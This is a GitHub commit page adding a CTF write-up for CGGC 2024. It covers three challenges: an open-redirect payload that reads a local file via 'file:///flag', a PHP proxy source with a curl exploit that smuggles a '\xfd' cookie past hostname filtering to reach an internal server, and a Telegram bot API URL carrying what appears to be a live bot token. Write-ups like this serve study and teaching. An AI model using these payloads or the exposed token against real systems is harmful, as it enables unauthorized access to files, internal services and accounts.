generated from saicaca/fuwari
-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
2 changed files
with
96 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,93 @@ | ||
| --- | ||
| title: ( Writeup ) CGGC 2024 | ||
| published: 2024-11-02 | ||
| description: 'CGGC 2024' | ||
| image: '' | ||
| tags: [Writeup, CTF] | ||
| category: 'WriteUps' | ||
| draft: false | ||
| --- | ||
|
|
||
| ## Preview Site 🔍 | ||
| > Description: This website allows you to preview this website. | ||
| ### Exploit | ||
| - Login as guest (pwd: guest) | ||
| - Go to /fetch | ||
| - Payload: `http://previewsite/logout?next=file:///flag` | ||
|
|
||
| **FLAG:** | ||
| `CGGC{open_redirect_to_your_local_file_2893hrgiubf3wq1}` | ||
|
|
||
| --- | ||
|
|
||
| ## Proxy | ||
|
|
||
| > Description: Access http://secretweb/flag to get flag. | ||
| ### Source File | ||
| ```php | ||
| <?php | ||
|
|
||
| function proxy($service) { | ||
| // $service = "switchrange"; | ||
| // $service = "previewsite"; | ||
| // $service = "越獄"; | ||
| $requestUri = $_SERVER['REQUEST_URI']; | ||
| $parsedUrl = parse_url($requestUri); | ||
|
|
||
| $port = 80; | ||
| if (isset($_GET['port'])) { | ||
| $port = (int)$_GET['port']; | ||
| } else if ($_COOKIE["port"]) { | ||
| $port = (int)$_COOKIE['port']; | ||
| } | ||
| setcookie("service", $service); | ||
| setcookie("port", $port); | ||
| $ch = curl_init(); | ||
| curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); | ||
| $filter = '!$%^&*()=+[]{}|;\'",<>?_-/#:.\\@'; | ||
| $fixeddomain = trim(trim($service, $filter).".cggc.chummy.tw:".$port, $filter); | ||
| $fixeddomain = idn_to_ascii($fixeddomain); | ||
| $fixeddomain = preg_replace('/[^0-9a-zA-Z-.:_]/', '', $fixeddomain); | ||
| curl_setopt($ch, CURLOPT_URL, 'http://'.$fixeddomain.$parsedUrl['path'].'?'.$_SERVER['QUERY_STRING']); | ||
| curl_exec($ch); | ||
| curl_close($ch); | ||
| } | ||
|
|
||
| if (!isset($_GET['service']) && !isset($_COOKIE["service"])) { | ||
| highlight_file(__FILE__); | ||
| } else if (isset($_GET['service'])) { | ||
| proxy($_GET['service']); | ||
| } else { | ||
| proxy($_COOKIE["service"]); | ||
| } | ||
|
|
||
| ``` | ||
|
|
||
| ### Exploit | ||
| ```bash= | ||
| curl --path-as-is -i -s -k -X $'GET' \ | ||
| -H $'Host: 10.99.66.6' -H $'Cache-Control: max-age=0' -H $'Accept-Language: zh-TW' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \ | ||
| -b $'service=\xfd; port=80' \ | ||
| $'http://10.99.66.6/secretweb/flag' | ||
| ``` | ||
|
|
||
| **FLAG:** | ||
| `CGGC{1Dn_7O_45c11_5o_57R4n9E_11fc26f06c33e83f65ade64679dc0e58}` | ||
|
|
||
| --- | ||
|
|
||
| ## Day31- 水落石出!真相大白的十一月預告信? | ||
|
|
||
| ### Exploit | ||
|
|
||
| - https://ithelp.ithome.com.tw/articles/10363058 | ||
| -  | ||
|
|
||
| - 連線進入即可找到 Flag | ||
| https://api.telegram.org/bot7580842046:AAEKmOz8n3C265m2_XSv8cGFbBHg7mcnbMM/getUpdates | ||
|
|
||
|
|
||
| **FLAG:** | ||
| `CGGC{1_h8t3_y0u_K41d0_K4zm4}` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters